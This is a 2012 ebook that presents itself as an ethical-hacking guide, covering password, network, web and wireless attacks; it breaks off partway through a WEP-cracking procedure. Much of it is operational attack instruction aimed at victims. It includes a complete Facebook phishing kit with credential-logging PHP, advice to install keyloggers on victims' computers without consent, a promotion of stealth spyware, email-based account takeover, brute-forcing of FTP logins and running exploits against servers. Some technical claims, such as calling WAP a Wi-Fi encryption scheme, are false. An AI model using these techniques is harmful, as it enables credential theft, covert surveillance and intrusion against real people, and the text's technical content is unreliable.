Mypohebook

The Power of Hacking Complete Solution of your Dream to Become an Ethical Hacker and Computer Security Expert By: Karan Singh Chauhan www.krackoworld.com

Copyright Notice The information stored in this eBook may not be copied or reproduced unless until specific permissions have been given by the author. Any unauthorized use,distributing,reproducing is strictly prohibited. It is filed under DMCA protection.

Legal Disclaimer The information provided in this eBook is to be used for educational purposes only. The eBook creator is in no way responsible for any kind of misuse or damage done by you people after reading it. All of the information in this eBook is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. The word “Hack” or “Hacking” in this eBook should be regarded as “Ethical Hack” or “Ethical hacking” respectively. You implement the information given at your own risk.

© Copyright 2012 krackoworld.com. All Rights Reserved.

Table of Contents

Throughout this eBook the following contents are mentioned or discussed .

A. Introduction................................................................................5 1. Who is karan Singh Chauhan? 2. How can I use this eBook? 3. Hacker Definition 4. Hacker Hierarchy 5. What does it take to become an hacker? B. Programming............................................................................................4 1. Is it is mandatory to learn Programming or not? 2. Where should I start? 3. Best way to learn it 4. Advantages and Disadvantages of Programming C. Linux.......................................................................................................4 1. What is Linux? 2. Choosing a distribution 3. Running Linux 4. Learning Linux D. Passwords...............................................................................................9 1. Password Cracking methods ‌Dictionary Attacks, Brute-force Attacks, Rainbow tables and software’s 2. Phishing Attacks 3. Keylogging 4. Shoulder Surfing and Guessing 5. Social Engineering 6. Primary Email Address hack 7. Harmful viruses and Scripts 8. Some ready-made tools and software's 9. Countermeasures E. Network Hacking.....................................................................................6 1. Foot printing 2. Port Scanning 3. Banner Grabbing 4. Vulnerabilities Searching 5. Penetrating testing

6. Countermeasures F. Wireless Hacking.....................................................................................5 1. Scanning for Wireless Networks 2. Types of Encryption 3. Cracking WEP 4. Packet Sniffing 5. Countermeasures G. Windows Hacking...................................................................................3 1. NetBIOS 2. Cracking Windows Passwords 3. Countermeasures H. Web Hacking.................................................................................................10 1. How to find a vulnerable website and start hacking? 2. Cross Site Scripting 3. Performing SQL Attacks 4. Denial of Service Attack 5. Remote File Inclusion 6. Cookie Poisoning 7. DOTNetNuke 8. Local File Inclusion 9. Session Hijacking 10. Countermeasures I. Malware.........................................................................................3 1. Types of Malware 2. ProRat 3. Countermeasures J. Conclusion............................................................................................7 1. Congratulations 2. Tell others about my eBook 3. My Website/Blog 4. Suggestions 5. Keep us Strong 6. Any Doubts are welcomed here 7. Warm Regards

Chapter One- Introduction

Who is Karan Singh Chauhan ? Karan is a 18 years old guy, currently living in Punjab,India as a B.tech student (Engineer) in the field of Electronics and Comm. He is an Ethical hacker,Security Expert, Computer software developer and eBook Writer as well. During his leisure time, he loves to write what he knows well at KrackoWorld (author and founder). He started blogging in the late 2010 just for fun and to increase its popularity worldwide. At that time,he was in 12th class as a non-medical student. He had a lot of knowledge about Computer in the field of basics,software,hardware and web designing also because from 6th class he started doing extra courses of it. And from this, his life changed dramatically and gets involved in the world of Blogging. Giving Special thanks to my God, Parents and Blogger which gives me the platform to express myself in front of the whole world by choosing this way Out. The purpose of building KrackoWorld and writing posts on it is to Aware People what's Going Around it related to the terms of Ethical hacking and Cyber Security. I never wanted or dreamed is to hack someone's account just for entertainment & money, but the main issue was that to tell my readers about the tricks usually hackers do to steal information and data by yourself for education purposes only. My only addiction is to help and protect people from getting hacked and secure them in future as I am an white hat hacker. Our Moto and Aim : Know Hacking But No Hacking

Enjoy! Karan Singh Chauhan

How can I use this eBook ? Congratulations! Because you have successfully taken your first step in the field of Ethical hacking and Security Tips to become an Master hacker. Now you will acquire many things as given below : 1. Getting the ability of thinking like hackers and Crackers. 2. You may wish to seek a career in Ethical Hacking – Usually hired by an organization/Department, an ethical hacker uses the same tools and techniques as a hacker to find and secure vulnerabilities in computer systems. 3. Show off your friends with your newly found techniques and implement in your real world entities. It’s FUN! 4. Secure your computer from Trojans, worms, Adwares etc.

Hacker Definition

An hacker is someone who likes to tinker with electronics or computer systems to fun out. Hackers like to explore and learn how computer systems work, finding ways to make them do what they do better, or do things they weren’t intended to do. There are two types of hackers below : White Hat These are considered the good guys. White hat hackers don’t use their skills for illegal purposes. They usually become Computer Security experts and help protect people from the Black Hats. Black Hat These are considered the bad guys. Black hat hackers usually use their skills maliciously for personal gain. They are the people that hack banks, steal credit cards,Hack email idpasswords and deface websites.

Hacker Hierarchy

Script kiddies These are the wannabe hackers. They are looked down upon in the hacker community because they are the people that make hackers look bad. Script kiddies usually have no hacking skills and use the tools developed by other hackers without any knowledge of what’s happening behind the scenes. Intermediate hackers These people usually know about computers, networks, and have enough programming knowledge to understand relatively what a script might do, but like the script kiddies they use pre-developed well-known exploits (- a piece of code that takes advantage of a bug or vulnerability in a piece of software that allows you to take control of a computer system) to carry out attacks. Elite Hackers These are the skilled hackers. They are the ones that write the many hacker tools and exploits out there. They can break into systems and hide their tracks or make it look like someone else did it. You should strive to eventually reach this level.

What does it take to become an hacker ? Becoming a great hacker isn’t easy and it doesn’t happen quickly. Being creative helps a lot. There is more than one way a problem can be solved, and as an hacker, you may encounter many problems. The more creative you are the bigger chance you have of hacking a system without being detected. Another huge quality you must have is the will to learn because without it, you will get nowhere. Remember, Knowledge is best power. Patience is also a must because many topics can be difficult to grasp and only over time will you master them. In the end, I would like to say only 1 line “ Exploring is the best way to become an successful Hacker in today’s world “.

Chapter Two- Programming Is it is mandatory to learn Programming or not ?

Lots of readers often ask me that is learning programming is mandatory for a hacker to increase its potential, So the answer is “yes” but in some cases. At least we have the knowledge of little basics of it. hence programming helps us to became an elite hacker. Therefore today, I am going to tell you the advantages and disadvantages of learning programing and also how to learn it properly as well. Enjoy !

Where should I start ? Many people finally decide that they are going to begin learning a programming language, but don’t know where to start. I believe that before you begin to learn a programming language, you should first master HTML (Hypertext Markup Language). HTML is part of what makes up all of the website pages you see on the internet. HTML is very easy to learn and it will helps you to have a look at source code. Blogging and

template designing is also a best way to learn it in my point of view. From there I would suggest starting your programming life with C. C is one of the most popular languages, and it is what makes up the majority of the exploits out there today. C also makes some of the most powerful hacking programs and viruses that are out there today.

Best way to learn it 1. Purchase a beginners book on your programming language usually in English. Before you choose the book, make sure you read the reviews to make sure it’s a good choice. 2. It is important that once you begin learning the programming language through your book, you don’t take big breaks. Taking long breaks will cause you to forget things you learned in the beginning that apply to the rest of the book. 3. Do ALL of the practice problems provided in the book. The only way you will become better is by applying what you learn. 4. When something difficult comes up or something that makes no sense to you, don’t avoid or skip it. Instead embrace it! This is how you actually learn. If you still don’t understand it after going over it multiple times, find someone that can help you. 5. Join a programming forum. Search for a website on your programming language that has a large user base. There will be many professionals on there that will be able to help you when you get stuck. 6. Practice. Practice Practice. Think of ideas for fun programs that you could make and program them!

Advantages and Disadvantages of Programming Advantages 1. You’ll be considered an elite hacker. 2. Imagine a black hat discovers a vulnerability and codes an exploit for it that no one

else knows about. The black hat would be able to take down thousands of machines before anyone discovers and patches the vulnerability. 3. You will feel so much more satisfied having created your own program or exploit. I promise you this. So my advice is, don’t settle for being a point and click hacker. Take some time to understand even just the basics of programming and an entire new world of hacking will open up to you. Disadvantages 1. You’ll be considered an script kiddies. 2. You don’t have your own point of view and rearrangement. 3. You cannot find holes & vulnerabilities. 4. No idea of creating your own tools and exploits etc.

Chapter Three- Linux

What is Linux ? Let me clear you that Linux is a free, open-source, UNIX-like operating system. The name "Linux" comes from the Linux kernel, originally written in 1991 by Linus Torvalds. It can be installed on a wide range of computer hardware, starting from mobile phones,tablet computers, routers and video game consoles, to desktop computers, mainframes and supercomputers also. As you continue to learn how to hack, you will realize how important it is to learn how to use the Linux operating system. Here are the couple of facts & figures about it: 1. Millions of servers on the internet run on the Linux operating system. You must learn

the operating system to be able to penetrate these web servers. 2. Some of the best hacking programs only run on Linux.

Choosing a Distribution A Linux distribution is the Linux kernel (- central component of an operating system.) plus a collection of applications. If you are a beginner to Linux, I would suggest starting with Ubuntu as your first Linux distribution. It is simple to install and very user friendly.

Running Linux There are many ways to get Linux up and running. I will show you the most popular methods below. • Live CD • Wubi • VirtualBox

1. Live CD Linux Live CD is a set of shell scripts which allows you to create your own Live Linux from an already installed Linux distribution. The Live system you create will be bootable from CD-ROM or a disk device, for example USB Flash Drive, USB Pen Drive, Camera connected to USB port, and so on. People use Linux Live scripts to boot Linux from iPod as well.

Procedure-

1. First of all download the Ubuntu Live CD .iso file from www.ubuntu.com . 2. Now save the file as

3. Therefore, once you downloaded the iso file, burn that into a CD and restart your system respectively. 4. Now press del or F2 to launch BIOS of your Computer. 5. Inside your BIOS, go to the boot options and here you see “first boot device�, open it and change the whatever option to DVD-CD ROM. 6. Hit Save and exit.

7. Hence, the system will restart again and you will see the given picture below-

8. All Done ! Select your language and Enjoy its all features. 2. Wubi

With the Wubi installer you can install and uninstall Ubuntu as any other Windows application. You can use the Live CD version to install Wubi if you followed the steps above and downloaded it. Or you can download the full 5 gigabyte version from http://wubi-installer.org/ .

3. VirtualBox

VirtualBox is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 2. See "About VirtualBox" for an introduction. All of you can download VirtualBox from https://www.virtualbox.org/wiki/Linux_Downloads . Presently, VirtualBox runs on Windows, Linux, Macintosh, and Solaris hosts and supports a large number of guest operating systems including but not limited to Windows (NT 4.0, 2000, XP, Server 2003, Vista, Windows 7), DOS/Windows 3.x, Linux (2.4 and 2.6), Solaris and OpenSolaris, OS/2, and OpenBSD etc .

Learning Linux You can now learn Ubuntu running and Linux through many ways as given below : •eBooks- A Practical Guide to Ubuntu Linux, How Linux Works, Understanding the

Linux Kernel, Third Edition •Online- Official Linux Website, Begin Linux, Linux Tutorials •Video Tutorials - Introduction to Linux, Ubuntu Linux Tutorials. Enjoy !

Chapter Four- Passwords Well! we can define Passwords as a set or form of security found on Computers and many websites. Passwords are created to save/protect our data and useful information from Hackers. Passwords consist of alphabets, words, numerical values, special symbol, digits etc. It is one of the easiest way for a hacker to gain unauthorized access to your computer or network.

Password Cracking Methods We can crack the passwords of an account by the following methods listed below-

Dictionary Attacks

Intro- Are you interested in cracking passwords' and more,so why not you try dictionary attacks instead of guessing passwords. So first let me explain what is a dictionary attack or how is it work? Dictionary attack uses a targeted technique of successively trying all the words in an exhaustive list called a dictionary (from a pre-arranged list of values). In contrast with a brute force attack, where a large proportion key space is searched systematically, a dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words for example a dictionary (hence the phrase dictionary attack) or a bible etc. Generally, dictionary attacks succeed because many people have a tendency to choose passwords which are short (7 characters or fewer), single words found in dictionaries or simple, easily-predicted variations on words, such as appending a digit. A dictionary attack is when a text file full of commonly used passwords, or a list of every word from the dictionary is used against a password database. Strong passwords usually aren’t vulnerable to this kind of attack. In the following example, I will use Brutus, a very common password cracker, to show a dictionary attack against an ftp server. Brutus is a Windows only program, but at the end of this chapter I will list a couple more password crackers, some of which are made for Mac, Windows, and Linux. Dictionary AttacksBefore I get into the example, you must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead

of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at http://www.hoobie.net/brutus/. Procedure : 1. First the hacker would choose a target. In this case it’s my home computer and

the IP address for your home computer is 127.0.0.1 . 2. By going to ftp://127.0.0.1I get a pop-up box asking for a username and password.

3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.

4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP. 5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port

scan. 6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames 7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at http://packetstormsecurity.org/Crackers/wordlists/. Below are examples of what a username and password list might look like.

8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists. 9. If you’re lucky, eventually it’ll get the right Username:Password combination. As you can see below, it got the correct combination of username – admin and password – password.

10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. Brutus leaves a huge log of your presence on the target server. That’s it !

Brute-force Attacks In cryptography, a brute-force attack is a strategy that can, in theory, be used against any encrypted data. Such an attack might be utilized when it is not possible to take advantage of other weaknesses in an encryption system (if any exist) that would make the task easier. It involves systematically checking all possible keys until the correct key is found. In the worst case, this would involve traversing the entire search space. Bruteforce attacks can take a long time to complete. Below I will show you how Brutus can be used against the same FTP server .

1. Put the target and port same as you did for the dictionary attack and remember for the pass mode choose Brute-force and then hit range.

2. Now you will see the box given below and select an option.

3. In this case, I will select Lowercase Alphabets because I know the password, but when you will try, select each option one by one to find yours password respectively. 4. Have patient and you will be done!

Rainbow Tables A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering the plain text password, up to a certain length consisting of a limited set of characters. A hash is a one way encryption so once a password is hashed, there is no way to get the original string from the hashed string. For ex- MD5.

Software’s in Action Cain and Abel is one of the popular software’s in these password hacking. You can download it from http://www.oxid.it/downloads/ca_setup.exe . John the Ripper - Powerful Cracking system and soft. More- RainbowCrack , THC Hydra etc.

Phishing Attacks Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. This is similar to Fishing, where the fisherman puts a bait at the hook, thus, pretending to be a genuine food for fish. But the hook inside it takes the complete fish out of the lake. Phishing is typically carried out by e-mail spoofing or

instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Around 50% of the accounts in today’s world is get hacked by this process.. that is why Phishing is considered as the simplest and easiest way of Hacking someone sensitive information. Below is the complete tutorial on it. Learn how to create it ?

1. First Open any website which you want to make phisher/ fake login page. for eg : Facebook.com 2. Now do right click and save the page. 3. Then open that page in notepad, search for "action = http://" and change the following address to login.php and also change method = " Post" to "GET" and hit save.

4. After editing save the page as "index.html". 5. Now its time to create login.php . Open any blank notepad and copy/paste this below code and save it as login.php

header ('Location: http://google.com'); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> Note :-By default the victim will be redirected to google.com once he clicks login ,If you want you can change the address you can do it by changing the www.google.com to any address you want. 6. Now create a simple and empty text file in notepad and save it as log.txt 7. Now create your own free web hosting account at my3gb.com or 110mb.com or 000webhost.com and upload all the three files. 8. Upload Index.html , login.php , log.txt we created in the above steps. We are done, our phisher / fake login page is ready to use‌. How to hack accounts ? Send the index.html (the uploaded one) link to your victim , once he/she will enter his/her information and do login with our fake login page, then every thing will be stored in the log.txt file placed in your hosting account, now open log.txt to see all the Login details. Its very simple to create phisher/fake login page for any website, Here i have taken the example of Facebook Phisher. Same you can also create the phisher of many websites like yahoo, Gmail, orkut etc..

Keylogging Keylogging is one of the easiest method to hack someone accounts with the help of keyloggers like sniper-spy, winspy etc. All you have to do is to install a keylogger into his/her computer(victims computer) without its permission. Basically an keylogger is that tool which records all the physical activities perform by an user at that particular pc including passwords,usernames,sites etc. Now when the person is going to open his/her account in any website, it will be captured by the keylogger and gets stored. Thus when you are free,go to yours victims house and at his/her pc see the passwords silently. You can also install it remotely if you are not in touch with your victim. Installing the keyloggers in cybercafÊs is also an good method to work out with. 1. Sniperspy Keylogger SniperSpy is a revolutionary product that will allow you to easily access *ANY* online accountor password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access! Why SniperSpy is the best? Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected. Here is a summary of benefits that you will receive with Sniperspy software1. Access ANY Password With SniperSpy you can hack any password and gain access to Facebook or any other online account. 2. Monitor Every Activity

You can monitor every activity of the target computer, take screenshots and record chats & IM conversations. 3. Never Get Caught SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught 4. Remote Installation Feature With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer. 5. Extremely Easy to Use Installing and using SniperSpy is simple and needs no extra skill to manage. 6. Completely Safe to Use This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users. 7. Works on both Windows and Mac Fully compatible with Windows 2000/XP/Vista/7 and Mac. So what are you waiting for? If you are really serious to hack anyone password ,then SniperSpy is for you. Go grab it now and expose the truth! Download

2. Winspy

You can download and install Winspy from here www.win-spy.com/ .

Shoulder Surfing When you type your password make sure that there is no one behind you attempting to peak and seeing what you are typing. If there is, turn around and warn him/her to not to do it again or wait until he goes from that particular place. Also, make sure you don’t keep any sticky notes laying around that have your password or password hints on them.

Guessing To prevent this attack from happening, never use a password like your birth date, your mobile number, your mother’s maiden name, your pets name, your spouse’s name, or

anything that someone may be able to guess easily. Also note- Never use passwords with order-wise digits, for ex – 12345678 etc..

Social Engineering This sounds very good, but I guess majority of people didn’t aware of it. For newbies, social engineering is method of retrieving password or the answer of security question simply by querying him(your victim). You have to be very careful while using this method as victim must not be aware of your intention. Just ask him cautiously using your logic and way.

Primary Email Address hack Primary Email Address Hack means that you will hack or gain access to your victims yahoo,Gmail,Rediff etc ids and now you will gonna reset her/his password by saying Facebook that you have forgotten the password thus by providing the email address of victims Facebook account which you will already hacked or cracked. Now you can see the password coming in the inbox and reset it by logging into yours victims Facebook account and he/she will be easily hacked. So, always remember to protect your Facebook primary email address and try to keep unknown or useless mail id as your primary email address. Note- for your better understanding, I have taken the example of Facebook here.

Harmful Viruses and ScriptsIf the hacker gets fail in Hacking someone's account by the methods mentioned above, then he/she getting started to produce harmful scripts or viruses like

OMG,WOW,DAMN,CLICK HERE and some other pranks etc. When you will click on it, you will be redirected to any of the hidden pages containing some inappropriate data and your acc. gets hacked. So i suggest you while on clicking such type of viruses you should must scan it with the help of good online scanners and never install any uncertified add-ons in your computer. Many scripts also lead to see various things and broke securities like in Facebook- how to see any persons private photos,How to remove FB Advertisements,How to break someone's privacy, how to undo Facebook Changes etc.

Some ready-made Tools and Software'sSome hackers or persons says that they will made a tool or hacking software by which you can easily hack someone's Facebook/Gmail etc accounts without knowing basics of hacking. Then they will ask you to buy that software for some dollars say $25, but the fact is that they are making you fool by providing this software which either works halfly or expires after sometime of fixing in the bugs. Examples of some of the software's are Facebook account Freezer, Gmail Hacking Tool, Yahoo Cracker etc.

Countermeasures Now I will show you about all the countermeasures you should take to protect yourself from the password cracking methods/attacks talked in this chapter above.

Dictionary Attacks To prevent this attack from happens, please do not use passwords from the

dictionaries. For ex- cricket, table, human etc. Always use passwords consisting of letters, alphabets, digits and some special symbols also. Brute-force Attacks To prevent this attack from happens, Always keep in mind to make very-2 long passwords using containing of many numbers and odd characters etc. Rainbow Tables Now you can avoid rainbow table cracking process by making extremely long passwords to bypass tables creating system. Phishing attacks They are very simple to detect. All you have to keep 2 things in mind. 1. (Let us take the example of Gmail) If anyone asks you to click on this link, you should first check whether the url is www.gmail.com or not, if it is gmailmail.com, gmailuser.110mb.com or anything else, just avoid it from clicking. 2. And always check whether the url is HTTP's supported or not. Note- Phishing page is not HTTP's supported. Keylogging To save yourself from this process, Please Note- Whenever you are logging into your personal account from cafes, friends computer, office etc, first check all the programs and search whether any keylogger is installed or not on that system. If installed, then remove it and do surfing safely. Keyloggers may be of Kbs and Mbs also.

Social Engineering

To save yourself from this attack happens, all you have to be very careful when someone asks you about some of yours personal information and security question answers. Always first know the person properly before telling him any personal info. by asking several relevant questions about you and him.

Shoulder Surfing, Guessing, Primary Email Address hack, Harmful Viruses and Scripts, Some ready-made Tools and Software's I have discussed all the countermeasures for the above topics in the paragraph where they are first defined.

Chapter Five- Network Hacking

Footprinting

Footprinting is the technique of gathering some information about the computer systems and the entities they belong to. This can be done by employing various computer security techniques such as network/DNS queries, port scanning, OS identification, ping services, WWW spiders and WHOIS information etc. Some of the widely used tools for footprinting are Telnet, NslookUp, Ping, Tracert, Netstat etc. Please have a look on them below. 1. Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not. To ping a particular host the syntax is (at command prompt)-c:/>ping hostname.com example:- c:/>ping www.google.com 2. Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc. It's syntax is (at command prompt)-c:/>netstat -n 3. Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port. The basic syntax of Telnet is (at command prompt)-c:/>telnet hostname.com By default telnet connects to port 23 of remote computer. So, the complete syntax isc:/>telnet www.hostname.com port example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21 4. Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination. It's syntax is (at command prompt)-c:/>tracert www.hostname.com

example:- c:/>tracert www.krackoworld.com

Here "* * * Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address. various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt. The information obtained by using tracert command can be further used to find out exact operating system running on target system and much more. Overview of Footprinting- To do it, 1. First the hacker will start collecting information about the targeting domain

which includes IP address, Registry information, website owner and contact info. Etc. through WHOIS tools. 2. Next the hacker would Ping the server to see if it is up and running because it is difficult to hack the offline server. For ex- www.downornot.com, www.just-ping.com

are the websites which pings a website server from different locations of the world. 3. Now the hacker would search its pages and directory via Google search engine

for some security loopholes.

Port Scanning Do you know friends that Port scanning is usually do to find and search open and closed ports of a website. Thus, if a hacker finds any open port, he/she would start looking for vulnerabilities and exploit them to control the website. For ex- Nmap is one of the popular software’s in port scanning and available for both windows and MAC users. You can download it from http://nmap.org/download.html . After installing it, type your victims website in the target section, hit Intense scan and type command as nmap -T Aggressive -A -v www.victims-website.com and then scan for all ports. For ex- You will find open port like this- 80/tcp on 192.168.1.110 . Learn How to Close it ! Choose Start -> Settings -> Control Panel -> Administrative Tools. Select Services. Scroll down in the list until you see the name of the service you want to close. Select it, change the start-up type to "Disabled," and click "Stop" to stop the service. Try to know what you're doing there, because you could stop services required to keep your machine running.

Banner Grabbing Now once you have founded open ports, just exploit them. Therefore, Banner Grabbing comes into play. Hence Banner grabbing is a technique or attack used by a hacker which will tell the hacker what type of operating system an application is running under and the version of the operating system. For example one could establish a connection to a target host running a web service with Netcat, then send a bad HTML request in order to get information about the

service on the host: [root@prober] nc www.targethost.com 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 11 May 2009 22:10:40 EST Server: Apache/2.0.46 (Unix) (Red Hat/Linux) Last-Modified: Thu, 16 Apr 2009 11:20:14 PST ETag: "1986-69b-123a4bc6" Accept-Ranges: bytes Content-Length: 1110 Connection: close Content-Type: text/html

How it worksLets for say port no.21 is open which is a FTP port. Now we will use telnet which I have discussed above for exploitation. To do this, open cmd from start menu and type- telnet www.victims-website.com 21 and hit enter. Now you will connect to server and displays some information (banner) about the software and type of version installed. Thats it! In the next topic, we will find vulnerabilities for it.

Vulnerabilities Searching After knowing Software and its version, now we have to look up at the vulnerabilities for some exploits. Once the exploit is being founded or discovered, we will run it against the server and take full control over the cpanel of the website. If there isn’t any, we would move onto another open port and try again on a different service.

Some of the most popular exploit databases used are Milw0rm, SecurityFocus, osvdb etc.

Penetrating Testing Penetration Testing is the act of evaluating the Security of system or network by exploiting vulnerabilities or is a method of evaluating the security of a computer system/network by simulating an attack from malicious outsiders and malicious insiders etc.. This will determine whether unauthorized or malicious activity is possible in a system or not. Why Penetration Testing only ? •Penetration testing can identify the vulnerabilities that is not identified by an automated vulnerability scanners. •Determining the feasibility of a particular set of attack vectors •Determining the Critical Vulnerabilities . •Testing the ability of network defenders to successfully detect and respond to the attacks •Testing stability of the system against the DDOS attack and many more. White Box vs Black Box Penetration testing can be performed in different ways as given below. The methods can be classified into three types based on the knowledge about the System being tested. White Box: In white box testing, Pen Tester know everything about the system such as source code,network diagrams, IP addressing info. Black Box: Black box testing assumes no prior knowledge of the infrastructure to be tested. The

testers must first determine the location and extent of the systems before commencing their analysis.

Web application penetration testing : This testing will be used to find the following web application vulnerabilities: •SQL Injection •XSS(Cross site Scripting) •DDOS •Clickjacking •Buffer overflow Penetration Testing Tool: Penetration Testing tools are used as part of a penetration test to automate certain tasks, improve testing efficiency, and discover issues that might be difficult to find using manual analysis techniques alone. As a Penetration Tester, you will need lot of Penetration testing tools to test the Security of system. Searching ,downloading and installing the required software may take time. You can use a Penetration Testing Distribution instead. What is Pen Testing Distribution? Penetration Testing Distribution is an open source Operating System(Derived from Linux/BSD) that combines all required application for testing the security of system. It is specially developed for Security Professionals(Pen Testers/EthicalHackers/Forensic Officers... e.g.. Backtrack 5 Linux . What is the advantage of Penetration Testing Distribution? All Required application for security test are gathered in a single Operating system. You don't need to search for application, Save your time. Penetration Testing Distribution are open source and free to use. You can install in pen drive and bring it anywhere. ProcedureNow lets do a penetrating testing with PHP exploit given below.

I thing you all know PHP exploits as they are the widely used exploits in searching the vulnerabilities. They start from <?php and ends in ?> . Now suppose you found the osvdb exploit and wanted to damage the server. To do this, follow the steps below1. First of all download and install PHP on your computer along with WAMP. 2. Paste the PHP code in a notepad and save it as “exploit.php” and now you have to edit it carefully. 3. Now open it and search for $address = gethostbyname(‘192.168.1.110’); and replace 192.168.1.110 with your victims IP address and save it in the directory C:\wamp\bin\php\php5.2.5 4. Then open CMD ( Command Prompt) and type cd C:\wamp\bin\php\php5.2.5 and hit enter. 5. Now run the osvdb exploit by typing exploit.php in that and hence see the

results. 6. All done! You have successfully hacked the server.

Some of the other Exploits are1. Python- Download it from here - http://www.python.org/download/. 2. C/C++ etc.

Countermeasures 1. Keep your all software's up to date. 2. Install good anti-virus software or program like AVG, Norton Internet Security etc. 3. Always keep firewall option on to see which data/program comes out or in.

4. Scan your computer with the vulnerability scanner to find out some. 5. Get alert every time.

Chapter Six- Wireless Hacking Now a days, Wi-fi and many hotspots comes into play to do wireless hacking. People connect their laptops and PC with these wireless networks and enjoy high speeds usually in colleges and office only. But they don’t know that surfing on unidentified wireless networks leads them to hacking and cracking of their passwords and useful info. In this chapter, we are going to discuss how hackers use different types of techniques of hacking while connected to wireless networks.

Scanning for Wireless Networks First of all scan and find out some wireless network to start hacking by using these software’s below to suit you best. Choose one of them. In this case, I am choosing NetStumbler. Best Wireless Networks Scanner 2011- NetStumbler. Online scanners- AirRadar Other tool's - Kismet for Windows and KisMac for Mac.

Procedure-

1. Download and install NetStumbler from above. 2. Then run it to find the wireless networks available. 3. Now you have the following access points below-

4.

Green signal shows about the betterness of a signal etc. Advantages of NetStumbler It provides the MAC address, Channel number and encryption type as well.

Types of Encryption

1. Wired Equivalent Privacy (WEP)- It is a weak security algorithm for the wireless networks because its name implies that it is as secure as a wired connection. It should be cracked easily with the help of some tools which I gonna discuss below. Many Flaws has been discovered also by the hackers to crack its key very safely. 2. Wireless Application Protocol (WAP)- It is a technical standard for accessing information over a mobile wireless network. A WAP browser is a web browser for mobile devices such as mobile phones (called "cellular phones" in some countries) that uses the protocol. It is the most secure and best option to secure your wireless network. Cracking of it is much more difficult than WEP because in it, we have to use Dictionary and Brute-force attacks. Thus, takes long time to crack or sometimes not.

Cracking WEP To crack WEP easily, all you have to need a Live Linux Distribution known as BackTrack. Its latest version is 5.0. You can download it from here- .http://www.backtracklinux.org/downloads/ . BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option. BackTrack includes many well known security tools including: •Metasploit integration •RFMON Injection capable wireless drivers •Kismet

•Nmap •Wireshark (formerly known as Ethereal) •Hydra •Ophcrack •BeEF (Browser Exploitation Framework) •Ettercap •Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password. •Quypt (Terminal Emulator) (which is private software by Crimson Hacking group, which has leaked to the Mainstream) Blackhat. •A large collection of exploits as well as more commonplace software such as browsers.

RequirementsYou will need a wireless adapter, a nearby WEP-enabled Wi-Fi network and a Live CD with BackTrack to perform this attack.

ProcedureTo crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands. First run the following to get a list of your network interfaces: airmon-ng The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface). Now, run the following four commands. See the output that I got for them in the screenshot below.

airmon-ng stop (interface) ifconfig (interface) down macchanger --mac 00:11:22:33:44:55 (interface) airmon-ng start (interface)

If you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55. Now it's time to pick your network. Run: airodump-ng (interface) To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take

note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.

